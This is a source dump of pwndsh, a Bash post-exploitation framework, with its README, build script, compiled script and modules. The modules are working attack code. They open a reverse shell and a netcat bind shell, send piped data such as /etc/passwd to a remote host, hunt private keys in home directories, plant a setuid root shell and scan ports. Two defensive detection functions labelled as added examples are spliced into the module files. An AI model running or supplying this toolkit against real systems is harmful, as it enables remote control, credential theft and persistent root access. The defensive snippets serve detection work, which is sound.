Repository: SafeBreach-Labs/pwndsh
Branch: master
Commit: 1239754a8dfd
Files: 12
Total size: 44.3 KB
Directory structure:
gitextract_ydkfa3ea/
├── LICENSE
├── README.rst
├── bin/
│   ├── compile_pwnd_sh.sh
│   └── pwnd.sh
└── pwnd/
    ├── _bootstrap.bash
    ├── _pwnd.bash
    ├── assets/
    │   └── priv_keys.bash
    ├── c2/
    │   ├── bindshell.bash
    │   └── reverseshell.bash
    ├── exfiltration/
    │   └── over_socket.bash
    ├── persistence/
    │   └── rootshell.bash
    └── reconnaissance/
        └── portscanner.bash
================================================
FILE CONTENTS
================================================
================================================
FILE: LICENSE
================================================
Copyright (c) 2016, SafeBreach
All rights reserved.
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
================================================
FILE: README.rst
================================================
PWND.SH
=======

pwnd.sh is a post-exploitation framework (and an interactive shell) developed in Bash shell scripting. It aims to be cross-platform (Linux, Mac OS X, Solaris etc.) with little to no external dependencies.

Slides from SkyDogCon 2016 are `available here <http://www.ikotler.org/JustGotPWND.pdf>`_

Install:
--------

.. code::

    $ cd bin/
    $ ./compile_pwnd_sh.sh

This will generate a file called ``pwnd.sh``

.. code::

    $ ls -la pwnd.sh
    -rw-r--r--@ 1 ikotler staff 7823 Oct 19 16:55 pwnd.sh

Now let's get pwnd!

.. code::

    $ source pwnd.sh
    [Pwnd v1.0.0, Itzik Kotler (@itzikkotler)]
    Type `help' to display all the pwnd commands.
    Type `help name' to find out more about the pwnd command `name'.
    (pwnd)$

Tested:
-------

* Mac OS X El Capitan (10.11.3) using GNU bash, version 3.2.57(1)-release (x86_64-apple-darwin15)
* Ubuntu 14.04.3 LTS using GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
* Oracle Solaris 11.3 X86 using GNU bash, version 4.1.17(1)-release (i386-pc-solaris2.11)

Features/Bugs:
--------------

Found a bug? Have a good idea for improving PWND.SH? Head over to `PWND.SH's GitHub <https://github.com/safebreach-labs/pwndsh>`_ page and create a new ticket or fork. If you want to contact us, please email: labs (at) safebreach (dot) com.

License:
--------

BSD 3-Clause
================================================
FILE: bin/compile_pwnd_sh.sh
================================================
#!/usr/bin/env bash
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
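##########
# Consts #
##########

DEFAULT_OUTPUT_FILENAME="pwnd.sh"

#############
# Functions #
#############

# Append file $1 to output $2, dropping every line that starts with '#'
# (license banners, comments), followed by a separator line.
normalize_and_append() {
    grep -v "^#" < "$1" >> "$2"
    echo " " >> "$2"
}

###############
# Entry Point #
###############

# Paths below are relative, so this script must be run from bin/.
output_filename="$DEFAULT_OUTPUT_FILENAME"
if [ -n "${1-}" ]; then
    output_filename="$1"
fi

# Start with a shebang line
echo "#!/usr/bin/env bash" > "$output_filename"

# Core definitions first; the modules call pwnd_register_cmd from _pwnd.bash
normalize_and_append "../pwnd/_pwnd.bash" "$output_filename"

# The name pattern skips the underscore-prefixed _pwnd.bash and _bootstrap.bash.
# Reading find's output line by line keeps paths with spaces intact.
find ../pwnd -type f -name "[a-zA-Z0-9]*.bash" | while IFS= read -r module; do
    normalize_and_append "$module" "$output_filename"
done

# Bootstrap (help, banner, prompt) goes last
normalize_and_append "../pwnd/_bootstrap.bash" "$output_filename"

ls -la "$output_filename"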
================================================
FILE: bin/pwnd.sh
================================================
#!/usr/bin/env bash
IFS=$' \t\n'
PWND_VERSION="1.0.0"
_pwnd_commands=()
pwnd_register_cmd() {
_pwnd_commands+=("$1;$2")
}
pwnd_isroot() {
local retval=0
if [ $EUID -ne 0 ]; then
echo "You must be a root user"
retval=1
fi
return $retval
}
__hunt_privkeys_usage() {
cat << "EOF"
usage: hunt_privkeys [dir ...]
Find all private keys that are textually encoded. Each DIR argument will be
recursively searched. Default directories are: `~root' and `dirname $HOME'
EOF
return 0
}
hunt_privkeys() {
local dirs
if [ $# -eq 0 ]; then
dirs=(~root "$(dirname "$HOME")")
else
dirs=("$@")
fi
for directory in "${dirs[@]}"; do
echo "Scanning $directory ..."
grep -ril "PRIVATE KEY" "$directory" 2> /dev/null
done
echo "Done!"
}
pwnd_register_cmd hunt_privkeys "Find all private keys that are textually encoded"
__bindshell_usage() {
cat << "EOF"
usage: bindshell port [arg ...]
A simple yet "cross platform" implementation of bindshell using nc, mkfifo
and bash. PORT is a TCP (by default) port number. Each ARG will be passed
directly to nc
EOF
return 0
}
bindshell() {
if [ -z "${1-}" ]; then
__bindshell_usage
return 0
fi
local tempfile=$(mktemp -u)
local port="$1"
mkfifo "$tempfile"
bash -i 2>&1 < "$tempfile" | nc "${@:2}" -l "$port" > "$tempfile"
}
pwnd_register_cmd bindshell "A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and bash"
__reverseshell_usage() {
cat << "EOF"
usage: reverseshell [-u] host port
A simple yet "cross platform" implementation of reverseshell using bash
sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default)
port number. The `-u' if specified says use UDP instead of the default option
of TCP.
EOF
return 0
}
reverseshell() {
local host proto port
if [ "${1-}" == "-u" ]; then
if [ -z "${3-}" ]; then
__reverseshell_usage
return 0
fi
host="$2"
proto="udp"
port="$3"
else
if [ -z "${2-}" ]; then
__reverseshell_usage
return 0
fi
proto="tcp"
port="$2"
host="$1"
fi
bash -i >& "/dev/$proto/$host/$port" 0>&1
}
pwnd_register_cmd reverseshell "A simple yet \"cross platform\" implementation of reverseshell using bash sockets"
__over_socket_usage() {
cat << "EOF"
usage: over_socket [-u] host port
A simple yet "cross platform" implementation of generic TCP and UDP socket
using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP
(by default) port number. The `-u' if specified says use UDP instead of
the default option of TCP.
Example:
$ cat /etc/passwd | over_socket localhost 80
This will open connection to localhost at port 80 TCP and will send over
the content of `/etc/passwd'
EOF
return 0
}
over_socket() {
local host proto port
if [ "${1-}" == "-u" ]; then
if [ -z "${3-}" ]; then
__over_socket_usage
return 0
fi
host="$2"
proto="udp"
port="$3"
else
if [ -z "${2-}" ]; then
__over_socket_usage
return 0
fi
proto="tcp"
port="$2"
host="$1"
fi
cat /dev/stdin > "/dev/$proto/$host/$port"
}
pwnd_register_cmd over_socket "A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets"
__install_rootshell_usage() {
cat << "EOF"
usage: install_rootshell [/path/to/shell] [/path/to/rootshell]
A simple yet "cross platform" implementation of rootshell using chmod and
bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL
is path to where to install the rootshell (default: mktemp -u)
EOF
return 0
}
install_rootshell() {
pwnd_isroot || return 1
local shellfile=${1-$SHELL}
local rootshell=${2-$(mktemp -u)}
cp "$shellfile" "$rootshell"
chmod u+s "$rootshell"
ls -la "$rootshell"
}
pwnd_register_cmd install_rootshell "A simple yet \"cross platform\" implementation of rootshell using \`chmod u+s' and bash"
__portscanner_usage() {
cat << "EOF"
usage: portscanner host [port/proto ...], [port-range/proto ...]
A simple yet "cross platform" implementation of portscanner using bash
sockets. HOST can be IPv4 address or hostname. PORT can be any port number.
PROTO can be `tcp' or `udp'. PORTS is comma-separated PORTs. PORT-RANGE is
any range between 1 to 65535 following `/tcp' or `/udp' postfix.
Examples:
$ portscanner localhost 80/tcp
This will check if TCP port 80 is open on localhost.
$ portscanner localhost 53/tcp,53/udp
This will check if TCP port 53 and UDP port 53 are opened on localhost.
$ portscanner localhost 1-1024/tcp,69/udp
This will check if TCP ports 1 to 1024 are opened and if UDP port 69
is opened on localhost.
EOF
return 0
}
__portscanner_timeout() {
# Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time
`perl -e 'alarm shift; open STDERR, "> /dev/null"; exec @ARGV' "$@"`
# `` works better than $() in Linux when it comes to suppressing the 'Alarm' message _AND_ still having alarm terminate the process
}
portscanner() {
if [ -z "${2-}" ]; then
__portscanner_usage
return
fi
local host="$1"
local ports=()
local csv_args=()
IFS=',' read -ra csv_args <<< "${@:2}"
for arg in "${csv_args[@]}"; do
case "$arg" in
*-*)
# i.e. 1-1024/tcp
local range_ports=()
IFS='/' read -ra range_ports <<< "$arg"
IFS='-' read start end <<< "${range_ports[0]}"
for ((port=start; port <= end; port++)); do
ports+=("$port/${range_ports[1]}")
done
;;
*,*)
# i.e. '53/tcp, 53/udp'
IFS=',' read -ra ports <<< "$arg"
;;
*)
# i.e. '80/tcp'
ports+=("$arg")
;;
esac
done
for port in "${ports[@]}"; do
local conn_parameter=()
IFS='/' read -ra conn_parameter <<< "$port"
__portscanner_timeout 1 "echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}" &&
echo "port $port is open" ||
echo "port $port is closed"
done
}
pwnd_register_cmd portscanner "A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets"
__bash_help_usage() {
echo "Execute bash builtin help and pass any argument to it"
}
bash_help() {
local help_topic=""
if [ ! -z "${1-}" ]; then
help_topic="$1"
fi
bash -c "help $help_topic"
}
__help_usage() {
cat << "EOF"
usage: pwnd-help <name>
Display helpful information about pwnd commands. If NAME is specified,
gives detailed help on command NAME, otherwise a list of the pwnd commands
is printed.
To access bash builtin help use: `bash_help'
EOF
return 0
}
help() {
if [ ! -z "${1-}" ]; then
eval "__$1_usage" 2> /dev/null
if [ $? == 127 ]; then
echo "pwnd-help: no help topics match \`$1'. Try \`help' to see all the defined commands"
return 127
fi
else
cat << EOF
pwnd, version ${PWND_VERSION} (${MACHTYPE})
These pwnd commands are defined internally. Type \`help' to see this list.
Type \`help name' to find out more about the pwnd command \`name'.
EOF
for pwnd_command in "${_pwnd_commands[@]-}"; do
IFS=';' read -ra pwnd_cmd_parameters <<< "$pwnd_command"
# IFS=';' pwnd_cmd_parameters=($pwnd_command)
printf "%-19s -- %s\n" "${pwnd_cmd_parameters[0]}" "${pwnd_cmd_parameters[1]}"
done
fi
}
cat << EOF
[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]
Type \`help' to display all the pwnd commands.
Type \`help name' to find out more about the pwnd command \`name'.
EOF
PS1="(\[\033[92m\]\[\033[1m\]pwnd\[\033[0m\]\[\033[39m\])${PS1-}"
================================================
FILE: pwnd/_bootstrap.bash
================================================
# _bootstrap.bash, interactive pwnd shell

__bash_help_usage() {
    echo "Execute bash builtin help and pass any argument to it"
}

bash_help() {
    local help_topic=""
    if [ -n "${1-}" ]; then
        help_topic="$1"
    fi
    # Run in a child bash because `help' is redefined below
    bash -c "help $help_topic"
}

__help_usage() {
cat << "EOF"
usage: pwnd-help <name>
Display helpful information about pwnd commands. If NAME is specified,
gives detailed help on command NAME, otherwise a list of the pwnd commands
is printed.
To access bash builtin help use: `bash_help'
EOF
    return 0
}

help() {
    if [ -n "${1-}" ]; then
        # Call the usage function by name; bash returns 127 if it is not defined
        "__${1}_usage" 2> /dev/null
        if [ $? -eq 127 ]; then
            echo "pwnd-help: no help topics match \`$1'. Try \`help' to see all the defined commands"
            return 127
        fi
    else
cat << EOF
pwnd, version ${PWND_VERSION} (${MACHTYPE})
These pwnd commands are defined internally. Type \`help' to see this list.
Type \`help name' to find out more about the pwnd command \`name'.
EOF
        for pwnd_command in "${_pwnd_commands[@]-}"; do
            IFS=';' read -ra pwnd_cmd_parameters <<< "$pwnd_command"
            # IFS=';' pwnd_cmd_parameters=($pwnd_command)
            printf "%-19s -- %s\n" "${pwnd_cmd_parameters[0]}" "${pwnd_cmd_parameters[1]}"
        done
    fi
}

###############
# Entry Point #
###############

cat << EOF
[Pwnd v${PWND_VERSION}, Itzik Kotler (@itzikkotler)]
Type \`help' to display all the pwnd commands.
Type \`help name' to find out more about the pwnd command \`name'.
EOF

PS1="(\[\033[92m\]\[\033[1m\]pwnd\[\033[0m\]\[\033[39m\])${PS1-}"
================================================
FILE: pwnd/_pwnd.bash
================================================
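IFS=$' \t\n'

##########
# Consts #
##########

PWND_VERSION="1.0.0"

####################
# Global variables #
####################

# Registered commands, one "name;description" entry each
_pwnd_commands=()

#############
# Functions #
#############

# Register command $1 with description $2 so that `help' can list it
pwnd_register_cmd() {
    _pwnd_commands+=("$1;$2")
}

# Return 0 when running as root, otherwise print a message and return 1
pwnd_isroot() {
    local retval=0
    if [ "$EUID" -ne 0 ]; then
        echo "You must be a root user"
        retval=1
    fi
    return $retval
}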
================================================
FILE: pwnd/assets/priv_keys.bash
================================================
# priv_keys, Find all private keys that are textually encoded

__hunt_privkeys_usage() {
cat << "EOF"
usage: hunt_privkeys [dir ...]
Find all private keys that are textually encoded. Each DIR argument will be
recursively searched. Default directories are: `~root' and `dirname $HOME'
EOF
    return 0
}

hunt_privkeys() {
    local dirs directory
    if [ $# -eq 0 ]; then
        dirs=(~root "$(dirname "$HOME")")
    else
        dirs=("$@")
    fi
    for directory in "${dirs[@]}"; do
        echo "Scanning $directory ..."
        # -r recurse, -i ignore case, -l print only the names of matching files
        grep -ril "PRIVATE KEY" "$directory" 2> /dev/null
    done
    echo "Done!"
}

pwnd_register_cmd hunt_privkeys "Find all private keys that are textually encoded"
================================================
FILE: pwnd/c2/bindshell.bash
================================================
# bindshell, A simple yet "cross platform" implementation of bindshell using nc, mkfifo and /bin/bash

__bindshell_usage() {
cat << "EOF"
usage: bindshell port [arg ...]
A simple yet "cross platform" implementation of bindshell using nc, mkfifo
and bash. PORT is a TCP (by default) port number. Each ARG will be passed
directly to nc
EOF
    return 0
}

bindshell() {
    if [ -z "${1-}" ]; then
        __bindshell_usage
        return 0
    fi
    local tempfile=$(mktemp -u)
    local port="$1"
    mkfifo "$tempfile"
    bash -i 2>&1 < "$tempfile" | nc "${@:2}" -l "$port" > "$tempfile"
}

pwnd_register_cmd bindshell "A simple yet \"cross platform\" implementation of bindshell using nc, mkfifo and bash"
================================================
FILE: pwnd/c2/reverseshell.bash
================================================
# reverseshell, A simple yet "cross platform" implementation of reverseshell using bash sockets

__reverseshell_usage() {
cat << "EOF"
usage: reverseshell [-u] host port
A simple yet "cross platform" implementation of reverseshell using bash
sockets. HOST can be IPv4 address or hostname. PORT is a TCP (by default)
port number. The `-u' if specified says use UDP instead of the default option
of TCP.
EOF
    return 0
}

reverseshell() {
    local host proto port
    if [ "${1-}" == "-u" ]; then
        if [ -z "${3-}" ]; then
            __reverseshell_usage
            return 0
        fi
        host="$2"
        proto="udp"
        port="$3"
    else
        if [ -z "${2-}" ]; then
            __reverseshell_usage
            return 0
        fi
        proto="tcp"
        port="$2"
        host="$1"
    fi
    bash -i >& "/dev/$proto/$host/$port" 0>&1
}

pwnd_register_cmd reverseshell "A simple yet \"cross platform\" implementation of reverseshell using bash sockets"
================================================
FILE: pwnd/exfiltration/over_socket.bash
================================================
# over_socket, A simple yet "cross platform" implementation of generic TCP and UDP socket using bash sockets

__over_socket_usage() {
cat << "EOF"
usage: over_socket [-u] host port
A simple yet "cross platform" implementation of generic TCP and UDP socket
using bash sockets. HOST can be IPv4 address or hostname. PORT is a TCP
(by default) port number. The `-u' if specified says use UDP instead of
the default option of TCP.
Example:
$ cat /etc/passwd | over_socket localhost 80
This will open connection to localhost at port 80 TCP and will send over
the content of `/etc/passwd'
EOF
    return 0
}

over_socket() {
    local host proto port
    if [ "${1-}" == "-u" ]; then
        if [ -z "${3-}" ]; then
            __over_socket_usage
            return 0
        fi
        host="$2"
        proto="udp"
        port="$3"
    else
        if [ -z "${2-}" ]; then
            __over_socket_usage
            return 0
        fi
        proto="tcp"
        port="$2"
        host="$1"
    fi
    cat /dev/stdin > "/dev/$proto/$host/$port"
}

pwnd_register_cmd over_socket "A simple yet \"cross platform\" implementation of generic TCP and UDP socket using bash sockets"
================================================
FILE: pwnd/persistence/rootshell.bash
================================================
# rootshell, A simple yet "cross platform" implementation of rootshell using `chmod u+s' and bash
__install_rootshell_usage() {
    cat << "EOF"
usage: install_rootshell [/path/to/shell] [/path/to/rootshell]
A simple yet "cross platform" implementation of rootshell using chmod and
bash. /PATH/TO/SHELL is a path to shell (default: $SHELL). /PATH/TO/ROOTSHELL
is path to where to install the rootshell (default: mktemp -u)
EOF
    return 0
}
install_rootshell() {
    pwnd_isroot || return 1
    local shellfile=${1-$SHELL}
    local rootshell=${2-$(mktemp -u)}
    cp "$shellfile" "$rootshell"
    chmod u+s "$rootshell"
    ls -la "$rootshell"
}
pwnd_register_cmd install_rootshell "A simple yet \"cross platform\" implementation of rootshell using \`chmod u+s' and bash"
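A defensive counterpart to `install_rootshell`, added here as an example and not part of pwndsh: it searches directories for setuid files that are byte-identical to a shell listed in an `/etc/shells`-style file, which is the artifact that `cp` followed by `chmod u+s` leaves behind. The function name `suid_shell_copies` and its argument order are choices made for this example.

```sh
#!/bin/sh
# Added example, not part of pwndsh: detect setuid copies of login shells.
#
# suid_shell_copies SHELL_LIST DIR...
#   SHELL_LIST  file with one shell path per line (the /etc/shells format)
#   DIR...      directories to search
# Prints "<file> is a setuid copy of <shell>" per hit.
# Returns 0 when at least one copy is found, 1 otherwise.
suid_shell_copies() (
    shell_list=$1
    shift
    # find selects regular files with the setuid bit; the inner sh compares
    # each one byte-for-byte against every shell named in SHELL_LIST.
    hits=$(find "$@" -type f -perm -4000 -exec sh -c '
        list=$1
        shift
        for f in "$@"; do
            while IFS= read -r ref || [ -n "$ref" ]; do
                case $ref in /*) ;; *) continue ;; esac   # comments, blanks
                [ -f "$ref" ] || continue                 # shell not installed
                if cmp -s "$f" "$ref"; then
                    printf "%s is a setuid copy of %s\n" "$f" "$ref"
                    break
                fi
            done < "$list"
        done
    ' sh "$shell_list" {} + 2>/dev/null) || :   # unreadable dirs are not fatal
    [ -n "$hits" ] && printf '%s\n' "$hits"
)
```

Run it with enough privilege to read the candidates, for example `suid_shell_copies /etc/shells /tmp /var/tmp`; `install_rootshell` defaults to a `mktemp -u` path, so temporary directories are the first place to look.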
================================================
FILE: pwnd/reconnaissance/portscanner.bash
================================================
###########################################################################
# #
# Copyright (c) 2016, SafeBreach #
# All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions are #
# met: #
# #
# 1. Redistributions of source code must retain the above #
# copyright notice, this list of conditions and the following #
# disclaimer. #
# #
# 2. Redistributions in binary form must reproduce the #
# above copyright notice, this list of conditions and the following #
# disclaimer in the documentation and/or other materials provided with #
# the distribution. #
# #
# 3. Neither the name of the copyright holder #
# nor the names of its contributors may be used to endorse or promote #
# products derived from this software without specific prior written #
# permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS #
# AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, #
# INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF #
# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. #
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR #
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL #
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE #
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS #
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER #
# IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR #
# OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF #
# ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. #
# #
###########################################################################
# portscanner, A simple yet "cross platform" implementation of TCP and UDP port scanner using bash sockets
__portscanner_usage() {
    cat << "EOF"
usage: portscanner host [port/proto ...], [port-range/proto ...]>
A simple yet "cross platform" implementation of portscanner using bash
sockets. HOST can be IPv4 address or hostname. PORT can be any port number.
PROTO can be `tcp' or `udp'. PORTS is comma-separated PORTs. PORT-RANGE is
any range between 1 to 65535 following `/tcp' or `/udp' postfix.
Examples:
$ portscanner localhost 80/tcp
This will check if TCP port 80 is open on localhost.
$ portscanner localhost 53/tcp,53/udp
This will check if TCP port 53 and UDP port 53 are opened on localhost.
$ portscanner localhost 1-1024/tcp,69/udp
This will check if TCP ports 1 to 1024 are opened and if UDP port 69
is opened on localhost.
EOF
    return 0
}
# TODO: Add alternative implementations for `timeout'-like functionality
__portscanner_timeout() {
    # Based on: http://stackoverflow.com/questions/601543/command-line-command-to-auto-kill-a-command-after-a-certain-amount-of-time
    `perl -e 'alarm shift; open STDERR, "> /dev/null"; exec @ARGV' "$@"`
    # `` works better than $() in Linux when it comes to suppressing 'Alarm' message _AND_ still having alarm terminating the process
}
# Based on http://www.catonmat.net/blog/tcp-port-scanner-in-bash/
portscanner() {
    if [ -z "${2-}" ]; then
        __portscanner_usage
        return
    fi
    local host="$1"
    local ports=()
    local csv_args=()
    IFS=',' read -ra csv_args <<< "${@:2}"
    for arg in "${csv_args[@]}"; do
        case "$arg" in
            *-*)
                # i.e. 1-1024/tcp
                local range_ports=()
                IFS='/' read -ra range_ports <<< "$arg"
                IFS='-' read start end <<< "${range_ports[0]}"
                for ((port=start; port <= end; port++)); do
                    ports+=("$port/${range_ports[1]}")
                done
                ;;
            *,*)
                # i.e. '53/tcp, 53/udp'
                IFS=',' read -ra ports <<< "$arg"
                ;;
            *)
                # i.e. '80/tcp'
                ports+=("$arg")
                ;;
        esac
    done
    for port in "${ports[@]}"; do
        local conn_parameter=()
        IFS='/' read -ra conn_parameter <<< "$port"
        __portscanner_timeout 1 "echo >/dev/${conn_parameter[1]}/$host/${conn_parameter[0]}" &&
            echo "port $port is open" ||
            echo "port $port is closed"
    done
}
pwnd_register_cmd portscanner "A simple yet \"cross platform\" implementation of TCP and UDP port scanner using bash sockets"
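Each probe made by `portscanner` runs through `__portscanner_timeout`, so a child process is started whose command line contains the `/dev/<proto>/<host>/<port>` path. The following added example (not part of pwndsh) counts distinct ports per target in such command lines; `devsock_scan_targets` and the one-command-line-per-line input format are assumptions of this example.

```sh
#!/bin/sh
# Added example, not part of pwndsh: spot /dev/tcp and /dev/udp probing in
# process command-line telemetry.
#
# devsock_scan_targets MIN_PORTS < cmdlines
#   stdin      one process command line per line (exec audit log, EDR export)
#   MIN_PORTS  report a target once this many distinct ports were addressed
# Prints "<proto> <host> <distinct ports>", sorted.
devsock_scan_targets() {
    awk -v min="$1" '
    {
        rest = $0
        # A line may hold several socket paths; consume them left to right.
        while (match(rest, /\/dev\/(tcp|udp)\/[A-Za-z0-9._:-]+\/[0-9]+/)) {
            # Drop the leading "/dev/" and split into proto, host, port.
            split(substr(rest, RSTART + 5, RLENGTH - 5), p, "/")
            key = p[1] " " p[2]
            if (!((key, p[3]) in seen)) {
                seen[key, p[3]] = 1
                ports[key]++
            }
            rest = substr(rest, RSTART + RLENGTH)
        }
    }
    END {
        for (key in ports)
            if (ports[key] >= min)
                print key, ports[key]
    }' | LC_ALL=C sort
}
```

Command-line telemetry only sees probes that run through a child process, as `__portscanner_timeout` does, so pair this with connection-level logging.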